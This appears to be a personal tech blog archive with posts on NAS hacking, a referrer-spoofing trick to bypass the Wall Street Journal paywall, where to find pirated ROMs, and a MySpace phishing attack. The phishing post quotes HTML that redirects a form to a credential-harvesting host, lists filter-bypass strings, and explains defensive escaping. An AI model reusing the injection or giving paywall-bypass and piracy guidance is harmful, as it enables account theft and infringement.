mgroves

Turning an NAS drive into a media server

So, I bought myself a MyBook World 1TB network hard drive for Christmas. I was hoping that my Xbox 360 would "just see it" on the network, and I could stick all my videos and stuff on there via my laptop, or other computer.

I was wrong on both counts.

First, no matter what I did, I couldn't get my Xbox 360 to see it.

Second, in the process of trying to hack around with it, I made this little NAS drive into a pretty versatile media server.

I found this great little wiki site that's all about hacking the MyBook World. The key? Enabling SSH. Once you have that, you then have full root access to a lightweight Linux server right there in the same box. Now, this isn't exactly a powerhouse machine: it's some sort of ARM processor with something like 64MB of memory. But it turns out, you can do a lot with that.

The first step was being able to download and install/build stuff. To do that, I at least needed a compiler. Fortunately, the site above has a very handy zip file containing all I need to copy over a C compiler. Next, I installed a package manager called optware, which is kinda like an apt-get sort of thing, except it's meant to install stuff on embedded systems like NAS drives or routers.

From that point, no more compiling! I next installed ushare via optware, which is a media server. I had to play with the configuration a bit, but now my NAS drive (with a name of my choosing) shows up on Xbox 360! Woo!

But wait, there's more. Oh yes, much more. I also installed Transmission, a bittorrent client with a web interface. I think you see where this is going. My laptop is now no longer involved in any part of this. I can stick torrent files into a "watch" directory, and Transmission picks them up automatically. Of course, I can do this from any computer via SSH, or via the normal network drive share. I even installed Lynx on the NAS, so I can even skip the middleman.

And one last neat trick: I installed Python and pytvshows to automatically poll RSS feeds for shows that I want to watch and download their torrent files in the watch folder, where they get picked up by Transmission. Now it's completely hands-free! Unfortunately, pytvshows is a bit out of date, and ezrss.it doesn't seem very reliable these days. So, after CodeMash, I decided to install Ruby, and write my own torrent grabbing script.

In short, I wouldn't recommend getting this drive, unless you enjoy hacking around with it for endless hours. Fortunately for me, I'm a nerdy coder that's used compilers, linux, etc, before, so I had some idea of what I was doing. For the average Joe, this is a mountain of a task.

PDF Haberdashery

Here's a neat trick that I just learned. Ever wanted to print something to PDF, but for whatever reason, printing to your PDF Printer/CutePDF/etc was blocked?

Well, I've found an incredibly circuitous way around it!

First, make sure your actual printer is turned off. Yes, turned off. Now, try printing out the thing which you want to become a PDF. Your computer will likely say something like "GREERRRRORR CANNOT PRINT YOUR PRINTER IS OFF MMMBBEEP". This is good. Now, don't cancel or anything like that: leave the error message there!

Okay, now here's the tricky part: open up a file explorer window and go to c:\Windows\System32\spool\PRINTERS. You should see a file here like "FP00059.SPL". The "FP00059" could be anything, the important part is the .SPL. Copy this file somewhere else, like your desktop. Okay, now you can cancel the error or turn your printer back on and print, whatever.

So what is this SPL file? It's what's known as a "spool", which is an antiquated term meaning "stuff that's ready to print but hasn't been sent to the printer yet". If only there was some way to view this file...but wait! There is! I found a nice small program called EMF Printer Spool File Viewer, which, despite its incredibly ambiguous name, lets you view EMF Printer Spool Files. Download it, run it, file->open the SPL file.

Ahhhh, now we see the thing which we want to put in a PDF. Fortunately, the EMF file viewer has no problem letting you do a File->Print to PDF Printer/CutePDF/etc. So do it already. Now you have a nice PDF file with which to do all manner of haberdashery upon. Now don't use this to circumvent DRM or anything, because that would just be wrong.

Speedlinking, March 27, 2008

Speedlinking is yet another tool of the lazy blogger. Basically I smash together a bunch of interesting links that I collect every so often, and write a sentence or two about them.

This week's Speedlinking is being brought to you courtesy of the useful Instapaper website, which I've been using to temporarily bookmark the below links.

Speedlinking, February 1st, 2008

Speedlinking is yet another tool of the lazy blogger. Basically I smash together a bunch of interesting links that I collect every so often, and write a sentence or two about them.

ROMs

I get asked a lot "hey where do I get roms?"

More precisely, "HEY D00D WHAR IZ de ROMz?"

Well, I can't really host most of the commercial ROMs here on my site for fear of legal repercussions, but I can give you a few hints about where else to find them.

To be clear, the legality of ROMs is somewhat gray, but I'm almost 100% certain that it's illegal to have a ROM for a game that you do not already own in some other form. Even if you do own it, I'm not 100% sure it's legal to have it on a ROM. I am not a lawyer, and this is not legal advice.

That being said, here's some general guidelines on how to find ROMs. First, what the heck is a ROM? Well, to be more precise, when I say ROM, what I really mean is a ROM image, which is just a copy of data from a chip. It could be from an NES game, a Genesis game, or the firmware in a cell phone. A ROM isn't much use unless you are able to "flash" it to some sort of hardware or you have an emulator that can interpret the ROM on some non-native device (like your PC, or a Game King).

Okay, so there's lots of more information about ROMs and emulation out there, I'm not going to go over it all here, but you can check out some of my other blog posts about emulation.

Now, suppose you have an emulator/device/whatever and you want to get some ROMs to play games on it. Where do you get ROMs?

  • The "usual" sources. This includes P2P networks like Limewire, Shareaza, etc, and my current favorite, BitTorrent (which is much different than a traditional P2P network). You will need a BitTorrent program like BitComet and a website to download torrent files. Some good ones are The Pirate Bay and isoHunt. Torrents are a good way to get ROMs in quantity, but not so great if you are looking for specific ROMs.
  • IRC. Internet Relay Chat has been around for at least 100 years. It's the original chat protocol for the internet, before all you kids and your instant messenger and MySpaces and what not. Yeah it's good for chat, but it's also good for finding specific things. In this case, ROMs.

IRC is a big place. Where to start?

I'd recommend starting at roms-isos.com, the website for a chat room that I have been known to frequent, #roms-isos (IRC chat rooms start with #). You will eventually need an IRC program, of which the most widely used by far is mIRC (and for good reason). Once you have mIRC and have figured out how to connect to the #roms-isos chat room, you can follow this handy guide to using an FServe, which is a "file server" in an IRC chat room.

It's a little tricky and complex, but like I always say, nothing worth doing is ever easy. So, good luck, and stop asking me for ROMs. I won't give you any.

Super Frustration Brothers

Listen as the love child of Ray Romano and Christopher Walken comments on a video of the hardest Super Mario hack ever.

I can't find the original source of this hack, but it's rather masochistic and close to impossible.

There are some really funny lines in this video, and I encourage you to watch the whole thing.

The guy commenting wasn't actually playing, he just added his commentary.

Free Wall Street Journal subscription

The Wall Street Journal, for the most part, is a subscription based service. News Corp. has recently purchased the Dow Jones company, which owns The Wall Street Journal, and some speculate that they will turn it into a "free" service, much like the New York Times, USA Today, and pretty much every other newspaper's web presence.

Until that day, here is a trick to view any online Wall Street Journal (WSJ) article for free with only marginal hassle.

I pieced this hack together myself, though the parts of it are well documented elsewhere.

WSJ does publish some of its content for free already. I noticed that Google News always seemed to link to these free articles. I'm a WSJ RSS feed subscriber (they have a ton of different feeds, but I subscribe to a few). One day there was an article I really wanted to read the full version of. So, I just copied the title into Google News, and there it appeared. Something must be up!

I noticed mod=googlenews_wsj in the URL of the article. So that got me searching a little bit, and I found a Firefox hack to get WSJ articles for free. However, this method was kinda slow and annoying. Surely there's a better way!

Just adding mod=googlenews_wsj to the article URL doesn't work. So I figured that maybe they were also checking the referral URL, and that's why the Firebug/Webdev thing works. But that's so much hassle!

Enter RefControl. This is a Firefox plugin that allows you to control what page a site thinks you were referred from. So I just set "online.wsj.com" to always be referred from "news.google.com".

Once you have RefControl set up this way, the only hassle you have left to do is to change the URL querystring to mod=googlenews_wsj. For instance, this link from the main page: http://online.wsj.com/article/SB119090449388941349.html?mod=hpp_us_whats_news, just change it to http://online.wsj.com/article/SB119090449388941349.html?mod=googlenews_wsj. Done! Free WSJ for everyone.

There's probably a solution for IE and Opera as well, but for now this just works for Firefox.

Game King-II battery mod

When jonjay posted some pictures of the inside of his Game King-II, I realized that even though the instruction manual indicated a 1100mAh battery, that there was actually a 750mAh battery in there. Such dishonesty from a random Chinese company!

But nevermind, why not just put a 1100mAh battery in it for great justice?

So first, I cracked open the Game King-II myself, to see about the physical size of the battery, and if I could actually fit a different battery in there. Then, I went on to eBay to see what I could find.

Game King-II battery

The Game King-II uses a 3.7volt battery, which luckily for me, is pretty much the predominant battery used in cell phones. Next, I did a quick search for batteries in the 1000-1500mAh range. I found an LG 3.7volt 1100mAh battery which, by complete random luck, is the exact same size battery used in my cell phone. Perfect! Even if the mod doesn't work, I can at least upgrade my phone. Not to mention I couldn't really find any other batteries that would fit any higher than 1100mAh.

LG cell phone battery

The next trick was taking out the old battery. It's a ridiculously cheap looking battery. Imagine a tiny static bag filled with acid. The connections were soldered, and there were also some components connected to the battery on a small circuit board. I had to carefully remove the battery using a soldering iron.

Next, I had to figure out a way to connect the new battery. It's made to fit in a cell phone, not to be soldered, so I had to get creative. I carefully dropped some molten solder on to the terminals. Please be very careful if you do this! There is plastic, heat, and battery acid, not things you want to mess with. I would only recommend this if you have precision experience using a soldering iron. Don't apply heat directly to the battery.

I cut a couple of short jumpers, heated up the solder on the battery, and carefully attached them to the battery. I then wrapped it up with some electrical tape, but not too much, otherwise the battery wouldn't have fit back in.

Fortunately, the board indicated where to connect the positive and negative, so I then made another couple of precision solders to the battery board. I tried to cover everything up with a small amount of electrical tape as best I could.

When putting the battery back in, I used some of the sticky strip that held the previous battery in place on the new battery. These batteries are almost identical in size. I closed the Game King-II back up after a quick power-on to test.

Voila! Upgraded Game King-II with longer battery life! It should last about 46% longer. All in all, it cost me less than $5 and only took about an hour.

Xbox Live No More For Pirates?

As hundreds of thousands of people found out today, that little naughty thing you did with your 360's drive firmware is gonna cost ya.

As of 4:00 EST most of us were automatically signed out of XBox live and not allowed back in. It seems Microsoft finally did the impossible and banned all the people with firmware mods that allowed the play of backup games.

So far, this has caused an internet uproar and could lead to internet riots. Instead of griping about how Microsoft screwed you, remember back to the day you decided to mod, and the little guy on your shoulder named "good conscience" that said that someday you might get banned from Live. You had to expect this and you had to know Microsoft wasn't going to let it go forever.

My question is, what about the XBox Gold subscriptions that were paid for, and all the XBLA games that we purchased that we can't play anymore? Isn't it illegal to just take them away?

Some questions come from this:

  • How long 'til the next mod gets released that allows us to play on Xbox Live?
  • Why now? Did they have the power to do this the whole time? Did they just give us the taste of Halo 3 and then give the proverbial "go to hell"?

Just remember fellow pirates, we can still play the games, just can't do anything fun with them like get updated content, play online, or gain achievement scores.

I was phished!

It takes a big man to admit that he screwed up. At least, that's what I tell myself.

MySpace is the cesspool of the intertubes: angsty teens, dopey high schoolers, awful musicians, spammers, scammers, griefers, hackers, the rock stupid, and me.

MySpace hacks are nothing new. ha.ckers.org comes across vectors all the time, due to lazy or ignorant programming on behalf of MySpace. Phishing isn't new either. A web developer and long-time user of the web shouldn't fall prey to either of these attacks. But I did.

Now let me show you how simple the attack was, and how to do it yourself.

Let's start with the catalyst. A simple message in my MySpace inbox. Click on any of the following images for a full-size version.

MySpace Phish

See anything out of the ordinary? Look again:

MySpace Phish

That form is not submitting to MySpace.com. Chances are, you wouldn't even think to check the URL that the form submits to. After all, this form is definitely on MySpace.com, and why would their form submit to anything else? (Hindsight is making me feel real dumb at this point).

It turns out that changing the form URL is incredibly easy, or at least it was a day or two ago. Here's the HTML that makes up the message you see above:

<form action="http://messanger.myspace.com/[...whatever...]">
[....snip....]</p>
<table class="messageTable">
  <tbody>
    <tr> <th>From:</th> <td> [...snip...] </td> </tr>
    <tr> <th>Date:</th> <td> <span class="left">Apr 11, 2007 1:17 PM</span> [...snip...] </span> </td> </tr>
    <tr> <th>Subject:</th> <td>wtf....dont bother me!</td> </tr>
    <tr> <th>Body:</th> <td>
      </form>
      <form action=" http://login-myspace-viewmessage-mytoken-daw83kz.com/login.cfm.php ">
      You !@#$ little punk !@#$! <br /><br /><br />
    </td> </tr>
  </tbody>
</table>
<p>[.....snip....]
<input type="submit" value="-Reply-" name="whatever" />
</form>

If you are familiar with HTML forms, then you can see exactly what the problem is. Whoever wrote the message wrote a "close form" tag (</form>) and opened a new form tag (<form action="http://login-myspace-viewmessage-mytoken-daw83kz.com/login.cfm.php">). Since there were already "open" and "close" form tags on the page, the phisher simply broke the form into two pieces, with the second form capturing the buttons at the bottom of the page and submitting to a URL of his choosing.

Okay, so big deal, the form goes to some other URL. Why is that a problem? The exploit here is that most users don't expect to be hurtled off of MySpace at that point, which means that if the page they are hurtled to looks exactly like a MySpace login screen, then that user is likely to enter their login and password without a second thought. At this point, the phisher collects a login/password to your account, which means he can send spam, send more phishing attempts out, vandalize your site, or pretty much do anything he wants with your MySpace account.

Now maybe you're thinking: this attack seems too easy, too obvious. And you're right. MySpace allows HTML to be used in these messages, which is fine, except they don't filter out potentially problematic HTML, or don't filter it out well.

In fact, MySpace is notorious for this type of lazy code. Let's say you were a really naive programmer, or stupid, or whatever. If you saw this "</form>" problem, and were tasked with fixing it, what might you do? Maybe just remove "</form>" from all user input before sending the message? That'll work right? Wrong. What if the phisher typed in one of the following?

  • </fo</form>rm>
  • &lt;/form>

Your find & remove idea wouldn't work!
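
To make the failure concrete, here is an added example (not code from MySpace or from the original post) that runs the "find and remove" filter against the strings above and reports which form ends up owning the Reply button, next to a version that escapes the message body on output. The page layout in `render`, the placeholder host in `EVIL`, all function names, and the later entity-decoding stage in `naive_then_decode` are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

EVIL = "https://phish.example/login"   # constructed placeholder host
OPEN = '<form action="' + EVIL + '">'
PLAIN = "</form>" + OPEN               # the input the naive filter was written for
SPLIT = "</fo</form>rm>" + OPEN        # first bypass string from the post
ENTITY = "&lt;/form>" + OPEN           # second bypass string from the post

def naive_filter(body):
    """The 'find and remove' fix: delete the literal closing tag in one pass."""
    return body.replace("</form>", "")

def naive_then_decode(body):
    """Assumption: a later stage decodes entities after the filter has run."""
    return html.unescape(naive_filter(body))

def escape_on_output(body):
    """Hardened: encode every metacharacter, so the body is only ever text."""
    return html.escape(body, quote=True)

def render(body):
    """Hypothetical message page: the body sits inside the site's reply form."""
    return ('<form action="/reply"><div>' + body +
            '</div><input type="submit" value="-Reply-"></form>')

class SubmitTarget(HTMLParser):
    """Track which form's action the submit button ends up belonging to."""
    def __init__(self):
        super().__init__()
        self.current = None
        self.target = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and self.current is None:  # nested <form> is ignored
            self.current = attrs.get("action")
        elif tag == "input" and attrs.get("type") == "submit":
            self.target = self.current

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def submit_target(page):
    parser = SubmitTarget()
    parser.feed(page)
    parser.close()
    return parser.target

if __name__ == "__main__":
    for name, body in (("plain", PLAIN), ("split", SPLIT), ("entity", ENTITY)):
        print(name, submit_target(render(naive_then_decode(body))),
              submit_target(render(escape_on_output(body))))
```

Escaping everything means messages can no longer carry HTML at all; a site that wants to keep some formatting needs a parser-based allowlist of tags and attributes rather than string removal.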

Anyway, I could write a lot more about this, but sites like ha.ckers.org do a much better job.

Let me just show you that I did the same phishing attack in about 2 minutes (I sent my own account a phishing attempt):

MySpace Phish

Notice the address at the bottom.

So what's the point of all this? It's to show you that phishers aren't just dumb script kiddies interested in pranking--they are intelligent, dedicated hackers intent on making a buck. It's also to show you that a clever phishing attempt can fool anyone, from "dumb" average users, to "smart" IT professionals.

Though I suppose this whole article could just be an attempt to cover my shame. Man, I feel stupid!